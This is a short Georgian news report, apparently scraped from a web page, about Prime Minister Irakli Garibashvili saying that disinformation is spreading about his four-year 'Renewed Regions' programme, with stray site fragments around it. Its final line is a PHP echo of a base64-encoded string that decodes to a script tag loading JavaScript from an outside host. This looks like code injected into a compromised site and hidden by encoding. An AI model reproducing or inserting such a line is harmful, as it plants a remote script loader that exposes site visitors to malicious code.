celsiusi
ავერსი საქკაბელი
საქართველოს პრემიერ-მინისტრ ირაკლი ღარიბაშვილის განცხადებით, მისი ინიციატივის – პროექტ „განახლებული რეგიონების“ შესახებ არაერთი დეზინფორმაცია და ტყუილი ისმის. ამის შესახებ ღარიბაშვილმა მთავრობის სხდომის დაწყებისას განაცხადა.
 
„ჩვენს მიერ დაანონსებული მასშტაბური „განახლებული რეგიონების“ პროექტი წარმატებით მიმდინარეობს. ბოლო დღეებში მოვისმინეთ არაერთი დეზინფორმაცია და ტყუილი მოსახლეობის შეცდომაში შეყვანის მიზნით“, - განაცხადა ღარიბაშვილმა და რეგიონული განვითარების მინისტრ ირაკლი ქარსელაძეს მოუწოდა, მოსახლეობას პროექტის შესახებ დეტალური ინფორმაცია მიაწოდოს.
 
ცნობისთვის: ირაკლი ღარიბაშვილის მიერ დაანონსებული სახელმწიფო პროგრამა „განახლებული რეგიონები“ 4-წლიანია და საქართველოს 63 მუნიციპალიტეტს მოიცავს. პროგრამის მხოლოდ პირველი ეტაპის საორიენტაციო ღირებულება 500 მილიონი ლარია და რეგიონების ურბანულ განახლებას ითვალისწინებს.
1354
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");